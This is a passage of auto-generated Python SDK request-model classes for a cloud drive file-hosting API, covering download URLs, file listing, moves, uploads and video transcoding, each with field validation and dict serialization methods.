        # Serialize all non-None fields into a plain dict.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.permanently is not None:
            result['permanently'] = self.permanently
        if self.share_id is not None:
            result['share_id'] = self.share_id
        return result
    def from_map(self, m: dict = None):
        # Populate fields from dict *m*, skipping absent/None keys; returns self.
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('permanently') is not None:
            self.permanently = m.get('permanently')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        return self
class HostingGetDownloadUrlRequest(TeaModel):
    """
    Request body for getting a file download URL.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        expire_sec: int = None,
        file_name: str = None,
        file_path: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # drive_id
        self.drive_id = drive_id
        # expire_sec
        self.expire_sec = expire_sec
        # file_name
        self.file_name = file_name
        # file_path
        self.file_path = file_path
        self.referer = referer
        # share_id
        self.share_id = share_id
        self.sign_token = sign_token
    def validate(self):
        # file_path is mandatory (max 1000 chars); expire_sec must lie in
        # [10, 14400]; ids are pattern-checked when present.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.expire_sec is not None:
            self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
            self.validate_minimum(self.expire_sec, 'expire_sec', 10)
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in (
            'headers',
            'drive_id',
            'expire_sec',
            'file_name',
            'file_path',
            'referer',
            'share_id',
            'sign_token',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in (
            'headers',
            'drive_id',
            'expire_sec',
            'file_name',
            'file_path',
            'referer',
            'share_id',
            'sign_token',
        ):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingGetFileRequest(TeaModel):
    """
    Get file metadata request (hosting mode, path-addressed).
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # drive_id
        self.drive_id = drive_id
        # file_path  (fix: comment previously said "file_id")
        self.file_path = file_path
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        self.referer = referer
        # share_id
        self.share_id = share_id
        self.sign_token = sign_token
        # url_expire_sec
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process
        # type: string  (fix: was a bare `type:string` annotation statement left by the generator)
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        # file_path is mandatory (max 1000 chars); url_expire_sec must lie in
        # [10, 14400]; ids are pattern-checked when present.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
    def to_map(self):
        # Serialize all non-None fields into a plain dict.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.image_thumbnail_process is not None:
            result['image_thumbnail_process'] = self.image_thumbnail_process
        if self.image_url_process is not None:
            result['image_url_process'] = self.image_url_process
        if self.referer is not None:
            result['referer'] = self.referer
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.sign_token is not None:
            result['sign_token'] = self.sign_token
        if self.url_expire_sec is not None:
            result['url_expire_sec'] = self.url_expire_sec
        if self.video_thumbnail_process is not None:
            result['video_thumbnail_process'] = self.video_thumbnail_process
        return result
    def from_map(self, m: dict = None):
        # Populate fields from dict *m*, skipping absent/None keys; returns self.
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('image_thumbnail_process') is not None:
            self.image_thumbnail_process = m.get('image_thumbnail_process')
        if m.get('image_url_process') is not None:
            self.image_url_process = m.get('image_url_process')
        if m.get('referer') is not None:
            self.referer = m.get('referer')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('sign_token') is not None:
            self.sign_token = m.get('sign_token')
        if m.get('url_expire_sec') is not None:
            self.url_expire_sec = m.get('url_expire_sec')
        if m.get('video_thumbnail_process') is not None:
            self.video_thumbnail_process = m.get('video_thumbnail_process')
        return self
class HostingGetSecureUrlRequest(TeaModel):
    """
    Request body for getting a secure file URL.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        expire_sec: int = None,
        file_path: str = None,
        secure_ip: str = None,
        share_id: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # drive_id
        self.drive_id = drive_id
        # expire_sec, in seconds
        self.expire_sec = expire_sec
        # file_path
        self.file_path = file_path
        # secure_ip
        self.secure_ip = secure_ip
        # share_id
        self.share_id = share_id
    def validate(self):
        # file_path is mandatory (max 1000 chars); ids are pattern-checked.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in (
            'headers',
            'drive_id',
            'expire_sec',
            'file_path',
            'secure_ip',
            'share_id',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in (
            'headers',
            'drive_id',
            'expire_sec',
            'file_path',
            'secure_ip',
            'share_id',
        ):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingGetUploadUrlRequest(TeaModel):
    """
    Request body for fetching upload URLs for the parts of a file.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        content_md_5: str = None,
        drive_id: str = None,
        file_path: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # Content MD5; serialized under wire key 'content_md5' (at most 32 chars).
        self.content_md_5 = content_md_5
        # Numeric drive id (digits only).
        self.drive_id = drive_id
        # Path of the file being uploaded (required).
        self.file_path = file_path
        # Parts for which upload URLs are requested.
        self.part_info_list = part_info_list
        # Share id, when uploading through a share.
        self.share_id = share_id
        # Upload session id (required).
        self.upload_id = upload_id
    def validate(self):
        """Check required fields, formats and each nested part entry."""
        if self.content_md_5 is not None:
            self.validate_max_length(self.content_md_5, 'content_md_5', 32)
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.part_info_list:
            for part in self.part_info_list:
                if part:
                    part.validate()
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
        self.validate_required(self.upload_id, 'upload_id')
    def to_map(self):
        """Serialize to a plain dict using wire key names.

        'part_info_list' is always present (possibly empty); every other
        field is emitted only when non-None.
        """
        result = dict()
        for attr, key in (
            ('headers', 'headers'),
            ('content_md_5', 'content_md5'),
            ('drive_id', 'drive_id'),
            ('file_path', 'file_path'),
        ):
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        result['part_info_list'] = []
        if self.part_info_list is not None:
            for part in self.part_info_list:
                result['part_info_list'].append(part.to_map() if part else None)
        for field in ('share_id', 'upload_id'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict (wire key names); returns self."""
        m = m or dict()
        for attr, key in (
            ('headers', 'headers'),
            ('content_md_5', 'content_md5'),
            ('drive_id', 'drive_id'),
            ('file_path', 'file_path'),
        ):
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        # part_info_list is always reset, then rebuilt from nested maps.
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            for entry in m.get('part_info_list'):
                self.part_info_list.append(UploadPartInfo().from_map(entry))
        for field in ('share_id', 'upload_id'):
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class HostingListFileRequest(TeaModel):
    """
    Request body for listing hosted files under a parent path.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        addition_data: dict = None,
        drive_id: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        marker: str = None,
        parent_file_path: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # addition_data
        self.addition_data = addition_data
        # drive_id (digits only)
        self.drive_id = drive_id
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # limit (0-100)
        self.limit = limit
        # pagination marker
        self.marker = marker
        # parent file path (required)
        self.parent_file_path = parent_file_path
        self.referer = referer
        # share_id
        self.share_id = share_id
        self.sign_token = sign_token
        # url_expire_sec (10-14400)
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process, type: string
        # (was a stray bare statement line that lost its leading '#')
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        """Check required fields and range/format constraints."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 0)
        self.validate_required(self.parent_file_path, 'parent_file_path')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in (
            'headers', 'addition_data', 'drive_id',
            'image_cropping_aspect_ratios', 'image_thumbnail_process',
            'image_url_process', 'limit', 'marker', 'parent_file_path',
            'referer', 'share_id', 'sign_token', 'url_expire_sec',
            'video_thumbnail_process',
        ):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in (
            'headers', 'addition_data', 'drive_id',
            'image_cropping_aspect_ratios', 'image_thumbnail_process',
            'image_url_process', 'limit', 'marker', 'parent_file_path',
            'referer', 'share_id', 'sign_token', 'url_expire_sec',
            'video_thumbnail_process',
        ):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class HostingListUploadedPartRequest(TeaModel):
    """
    Request body for listing the parts already uploaded for an upload id.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        limit: int = None,
        part_number_marker: int = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # Numeric drive id (digits only).
        self.drive_id = drive_id
        # Path of the file being uploaded (required).
        self.file_path = file_path
        # Page size, 1-1000.
        self.limit = limit
        # Continue listing after this part number (>= 1).
        self.part_number_marker = part_number_marker
        # Share id, when listing through a share.
        self.share_id = share_id
        # Upload session id.
        self.upload_id = upload_id
    def validate(self):
        """Check required fields and range/format constraints."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 1000)
            self.validate_minimum(self.limit, 'limit', 1)
        if self.part_number_marker is not None:
            self.validate_pattern(self.part_number_marker, 'part_number_marker', '[0-9]+')
            self.validate_minimum(self.part_number_marker, 'part_number_marker', 1)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in ('headers', 'drive_id', 'file_path', 'limit',
                      'part_number_marker', 'share_id', 'upload_id'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in ('headers', 'drive_id', 'file_path', 'limit',
                      'part_number_marker', 'share_id', 'upload_id'):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class HostingMoveFileRequest(TeaModel):
    """
    Request body for moving (and optionally renaming) a hosted file.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        new_name: str = None,
        overwrite: bool = None,
        share_id: str = None,
        to_parent_file_path: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # drive_id (digits only)
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        # new_name
        self.new_name = new_name
        # overwrite, type: boolean
        # (was a stray bare annotation line that lost its leading '#')
        self.overwrite = overwrite
        # share_id
        self.share_id = share_id
        # destination parent file path
        self.to_parent_file_path = to_parent_file_path
    def validate(self):
        """Check id format constraints."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in ('headers', 'drive_id', 'file_path', 'new_name',
                      'overwrite', 'share_id', 'to_parent_file_path'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in ('headers', 'drive_id', 'file_path', 'new_name',
                      'overwrite', 'share_id', 'to_parent_file_path'):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class HostingVideoDRMLicenseRequest(TeaModel):
    """
    Request body for obtaining a video DRM license.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drm_type: str = None,
        license_request: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # DRM scheme; serialized under wire key 'drmType' (required).
        self.drm_type = drm_type
        # License request payload; wire key 'licenseRequest' (required).
        self.license_request = license_request
    def validate(self):
        """Both drm_type and license_request must be provided."""
        self.validate_required(self.drm_type, 'drm_type')
        self.validate_required(self.license_request, 'license_request')
    def to_map(self):
        """Serialize non-None fields to a dict with camelCase wire keys."""
        result = dict()
        for attr, key in (('headers', 'headers'),
                          ('drm_type', 'drmType'),
                          ('license_request', 'licenseRequest')):
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict with camelCase wire keys; returns self."""
        m = m or dict()
        for attr, key in (('headers', 'headers'),
                          ('drm_type', 'drmType'),
                          ('license_request', 'licenseRequest')):
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class HostingVideoDefinitionRequest(TeaModel):
    """
    Request body for listing available video definitions (resolutions).
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        protection_scheme: str = None,
        share_id: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # Numeric drive id (digits only).
        self.drive_id = drive_id
        # Path of the video file (required, at most 1000 chars).
        self.file_path = file_path
        # protection_scheme
        self.protection_scheme = protection_scheme
        # Share id, when accessing through a share.
        self.share_id = share_id
    def validate(self):
        """Check required fields and format constraints."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in ('headers', 'drive_id', 'file_path',
                      'protection_scheme', 'share_id'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in ('headers', 'drive_id', 'file_path',
                      'protection_scheme', 'share_id'):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class HostingVideoM3U8Request(TeaModel):
    """
    Request body for fetching a video's m3u8 playlist.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        definition: str = None,
        drive_id: str = None,
        expire_sec: int = None,
        file_path: str = None,
        protection_scheme: str = None,
        share_id: str = None,
        sign_token: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # Requested definition (resolution).
        self.definition = definition
        # Numeric drive id (digits only).
        self.drive_id = drive_id
        # Link lifetime in seconds, 60-86400.
        self.expire_sec = expire_sec
        # Path of the video file (required, at most 1000 chars).
        self.file_path = file_path
        # protection_scheme
        self.protection_scheme = protection_scheme
        # Share id, when accessing through a share.
        self.share_id = share_id
        # Signed access token (required).
        self.sign_token = sign_token
    def validate(self):
        """Check required fields and range/format constraints."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.expire_sec is not None:
            self.validate_maximum(self.expire_sec, 'expire_sec', 86400)
            self.validate_minimum(self.expire_sec, 'expire_sec', 60)
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
        self.validate_required(self.sign_token, 'sign_token')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in ('headers', 'definition', 'drive_id', 'expire_sec',
                      'file_path', 'protection_scheme', 'share_id',
                      'sign_token'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in ('headers', 'definition', 'drive_id', 'expire_sec',
                      'file_path', 'protection_scheme', 'share_id',
                      'sign_token'):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class HostingVideoTranscodeRequest(TeaModel):
    """
    Request body for starting a video transcode job.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        hls_time: int = None,
        protection_scheme: str = None,
        remarks: str = None,
        share_id: str = None,
        transcode: bool = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # Numeric drive id (digits only).
        self.drive_id = drive_id
        # Path of the video file (required, at most 1000 chars).
        self.file_path = file_path
        # hls_time
        self.hls_time = hls_time
        # protection_scheme
        self.protection_scheme = protection_scheme
        # remarks
        self.remarks = remarks
        # Share id, when accessing through a share.
        self.share_id = share_id
        # transcode
        self.transcode = transcode
    def validate(self):
        """Check required fields and format constraints."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in ('headers', 'drive_id', 'file_path', 'hls_time',
                      'protection_scheme', 'remarks', 'share_id',
                      'transcode'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in ('headers', 'drive_id', 'file_path', 'hls_time',
                      'protection_scheme', 'remarks', 'share_id',
                      'transcode'):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class ListByAnonymousRequest(TeaModel):
    """
    Request body for anonymously listing the files of a share.
    """
    def __init__(
        self,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        marker: str = None,
        parent_file_id: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        video_thumbnail_process: str = None,
    ):
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # limit (1-100)
        self.limit = limit
        # pagination marker
        self.marker = marker
        # parent_file_id (required, lowercase alphanumeric, at most 50 chars)
        self.parent_file_id = parent_file_id
        self.referer = referer
        # share_id (required)
        self.share_id = share_id
        self.sign_token = sign_token
        # video_thumbnail_process, type: string
        # (was a stray bare statement line that lost its leading '#')
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        """Check required fields and range/format constraints."""
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)
        self.validate_required(self.parent_file_id, 'parent_file_id')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        self.validate_required(self.share_id, 'share_id')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in (
            'image_thumbnail_process', 'image_url_process', 'limit',
            'marker', 'parent_file_id', 'referer', 'share_id',
            'sign_token', 'video_thumbnail_process',
        ):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in (
            'image_thumbnail_process', 'image_url_process', 'limit',
            'marker', 'parent_file_id', 'referer', 'share_id',
            'sign_token', 'video_thumbnail_process',
        ):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class ListDriveRequest(TeaModel):
    """
    Request body for listing drives.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        limit: int = None,
        marker: str = None,
        owner: str = None,
    ):
        # Custom HTTP headers forwarded with the request.
        self.headers = headers
        # Page size limit, 1-100.
        self.limit = limit
        # Pagination marker returned by a previous call.
        self.marker = marker
        # Owner of the drives.
        self.owner = owner
    def validate(self):
        """Check that limit, when given, is within [1, 100]."""
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in ('headers', 'limit', 'marker', 'owner'):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in ('headers', 'limit', 'marker', 'owner'):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class ListFileByCustomIndexKeyRequest(TeaModel):
    """
    Request body for listing files by custom index key.
    """
    def __init__(
        self,
        starred: bool = None,
        addition_data: dict = None,
        category: str = None,
        custom_index_key: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        fields: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        marker: str = None,
        order_direction: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        status: str = None,
        type: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # starred; serialized under wire key 'Starred' (capitalized).
        self.starred = starred
        # addition_data
        self.addition_data = addition_data
        # category
        self.category = category
        # custom_index_key (required)
        self.custom_index_key = custom_index_key
        # drive_id (digits only)
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # fields
        self.fields = fields
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # limit (0-100)
        self.limit = limit
        # pagination marker
        self.marker = marker
        # order_direction
        self.order_direction = order_direction
        self.referer = referer
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        self.sign_token = sign_token
        # status
        self.status = status
        # type
        self.type = type
        # url_expire_sec (10-14400)
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process, type: string
        # (was a stray bare statement line that lost its leading '#')
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        """Check required fields and range/format constraints."""
        self.validate_required(self.custom_index_key, 'custom_index_key')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 0)
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
    def to_map(self):
        """Serialize non-None fields to a plain dict.

        All keys equal the attribute names except ``starred``, which is
        serialized under the capitalized wire key 'Starred'.
        """
        result = dict()
        if self.starred is not None:
            result['Starred'] = self.starred
        for field in (
            'addition_data', 'category', 'custom_index_key', 'drive_id',
            'encrypt_mode', 'fields', 'image_cropping_aspect_ratios',
            'image_thumbnail_process', 'image_url_process', 'limit',
            'marker', 'order_direction', 'referer', 'share_id',
            'sign_token', 'status', 'type', 'url_expire_sec',
            'video_thumbnail_process',
        ):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        if m.get('Starred') is not None:
            self.starred = m.get('Starred')
        for field in (
            'addition_data', 'category', 'custom_index_key', 'drive_id',
            'encrypt_mode', 'fields', 'image_cropping_aspect_ratios',
            'image_thumbnail_process', 'image_url_process', 'limit',
            'marker', 'order_direction', 'referer', 'share_id',
            'sign_token', 'status', 'type', 'url_expire_sec',
            'video_thumbnail_process',
        ):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class ListFileDeltaRequest(TeaModel):
    """
    Request body for fetching incremental (delta) file-operation records.
    """
    def __init__(
        self,
        cursor: str = None,
        drive_id: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        video_thumbnail_process: str = None,
    ):
        # Cursor to resume listing from.
        self.cursor = cursor
        # drive_id (required, digits only)
        self.drive_id = drive_id
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # limit, default 100
        # (was a stray bare 'default 100' line — a SyntaxError — that lost its '#')
        self.limit = limit
        # video_thumbnail_process, type: string
        # (was a stray bare statement line that lost its leading '#')
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        """drive_id is required and must be digits only."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
    def to_map(self):
        """Serialize non-None fields to a plain dict; keys equal attribute names."""
        result = dict()
        for field in (
            'cursor', 'drive_id', 'image_cropping_aspect_ratios',
            'image_thumbnail_process', 'image_url_process', 'limit',
            'video_thumbnail_process',
        ):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict; returns self."""
        m = m or dict()
        for field in (
            'cursor', 'drive_id', 'image_cropping_aspect_ratios',
            'image_thumbnail_process', 'image_url_process', 'limit',
            'video_thumbnail_process',
        ):
            value = m.get(field)
            if value is not None:
                setattr(self, field, value)
        return self
class ListFileRequest(TeaModel):
    """
    List files request.

    Lists the children of ``parent_file_id`` inside either a drive
    (``drive_id``) or a share (``share_id``) — one of the two is required.
    """

    def __init__(
        self,
        addition_data: dict = None,
        all: bool = None,
        category: str = None,
        drive_id: str = None,
        fields: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        location: str = None,
        marker: str = None,
        order_by: str = None,
        order_direction: str = None,
        parent_file_id: str = None,
        parent_file_id_path: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        starred: bool = None,
        status: str = None,
        type: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # all
        self.all = all
        # category
        self.category = category
        # drive_id (digits only), see validate()
        self.drive_id = drive_id
        # fields
        self.fields = fields
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
